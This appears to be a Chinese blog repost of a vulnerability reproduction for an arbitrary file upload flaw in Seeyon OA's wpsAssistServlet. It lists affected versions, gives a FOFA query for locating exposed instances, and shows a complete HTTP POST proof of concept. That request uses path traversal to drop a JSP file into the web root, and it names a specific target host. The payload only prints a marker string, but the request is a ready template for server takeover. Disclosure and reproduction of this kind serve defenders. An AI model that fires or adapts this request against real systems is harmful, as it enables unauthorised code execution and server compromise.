首页 > 其他分享 >致远OA wpsAssistServlet 任意文件上传漏洞

致远OA wpsAssistServlet 任意文件上传漏洞

时间:2023-09-04 15:25:06浏览次数:39  
标签:致远 .. wpsAssistServlet OA 漏洞 上传

漏洞描述

致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限

影响版本

致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)
致远OA G6、G6N (V8.1、V8.1SP1)

漏洞复现

fofa语法:app="致远互联-OA" && title="V8.0SP2"
登录页面如下:

C://Seeyon/A6/base/temporary 为默认上传的位置,但 realFileType, fileId 参数可控,可以通过 ../ 遍历上传到任意目录下,验证POC

POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugg.jsp&fileId=2 HTTP/1.1
Host: oa.servechina.com.cn:80
Content-Length: 215
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("seeyon_vuln");%>
--59229605f98b8cf290a7b8908b34616b--


访问上传的文件,访问路径http://ip:port/debugg.jsp

标签:致远,..,wpsAssistServlet,OA,漏洞,上传
From: https://www.cnblogs.com/pursue-security/p/17677130.html

相关文章

  • java ClassLoader笔记(一)
    作者:fbysss关键字:ClassLoader一、SunJDKClassloader体系1.层次关系Bootstrap:加载rt.jar<-Extension:加载 jre/ext/*.jar <-System:加载CLASSPATH中的jar<-UserDefined加载用户自定义包类2.特殊点  BootstrapClassLoader为C++所写,ExtensionClassLoader的parent为null,其中......
  • Apache IoTDB开发之Load External TsFile工具
    LoadExternalTsFile工具简介加载外部tsfile工具允许用户从正在运行的ApacheIoTDB实例加载tsfiles、删除tsfile或将tsfile移动到目标目录。用法用户通过Cli工具或JDBC向ApacheIoTDB系统发送指定的命令以使用该工具。加载TS文件加载tsfiles的命令是。load"<p......
  • VMware NSX Advanced Load Balancer (NSX ALB) 30.1.1 发布 - 多云负载均衡平台
    VMwareNSXAdvancedLoadBalancer(NSXALB)30.1.1发布-多云负载均衡平台请访问原文链接:https://sysin.org/blog/vmware-nsx-alb-30/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org负载均衡平台NSXAdvancedLoadBalancerNSXAdvancedLoadBalancer(Avi)......
  • GraalVM 打包 Java ShellcodeLoader 为可执行文件
    GraalVM打包JavaShellcodeLoader为可执行文件url:https://app.yinxiang.com/fx/a6667249-7c5e-40dd-8bf6-e474fc844163title:GraalVM打包JavaShellcodeLoader为可执行文件date:2023-03-0212:37:26打包成Jar包先上项目地址:https://github.com/yzddmr6/Java-Sh......
  • 高性能网络通信模型——Reactor 和 Proactor
    原来8张图,就能学废Reactor和Proactor(qq.com)高并发编程--Reactor模式与Proactor模式(qq.com)Reactor模型Reactor,翻译为反应器,他是一个被动的感觉,可以理解为接收到客户端事件后,Reactor模型会根据事件类型调用相应的代码进行处理。Reactor模型也叫作Dispatcher模式,底层是......
  • What's the best approach for generating a new API key?
    https://stackoverflow.com/questions/14412132/whats-the-best-approach-for-generating-a-new-api-keyEdit:I'vespoketoafewfriends(email/twitter)andtheyrecommendedjustusingaGUIDwiththedashesstripped.......
  • 7-4 ALV 报表之 ALV GRID(OOALV)
     「ZPGM_ALV_GRID_DEMO」常用:「CL_GUI_ALV_GRID」でALVを新規作成;灵活性强,ALV实现报表方式上最为灵活; 実装の基本的な流れ:ステップ1:(オブジェクト)定義DATA:GRIDTYPEREFTOCL_GUI_ALV_GRID,G_CUSTOM_CONTAINERTYPEREFTOCL_GUI_CUSTOM_CONTAINER. ステッ......
  • Adobe Camera Raw 15.5最新版download for free支持最新相机
    AdobeCameraRaw中文版是一款Adobe增效工具滤镜,AdobeCameraRaw插件采用强大的图像处理技术,可以导入增强数字负片(DNG)格式的原始文件及编辑RAW文件,并提供最新型号相机和镜头配置文件支持.新版变化支持AdobeCameraRaw增效工具的CreativeCloud应用程序包括:AdobeBridge、P......
  • sass-loader以及node-sass版本问题造成启动项目失败
    SyntaxError:ValidationError:Invalidoptionsobject.SassLoaderhasbeen报错解决方法解决方法是:更新sass-loader以及node-sass的版本。安装命令:npminstallsass-loader+版本         npminstallnode-sass+版本安装后重启项目即可......
  • 用友致远U8-OA getSessionList jsp信息泄露复现
    1.漏洞描述用友U8-OAgetSessionList.jsp存在漏洞,攻击者通过该漏洞可以获取到所有用户的sessionID,利用获取到的sessionID即可登录到系统。2.网络测绘fofa:"用友U8-OA"3.漏洞复现1.登录页面2.验证POC/yyoa/ext/https/getSessionList.jsp?cmd=getAll3.将其拼......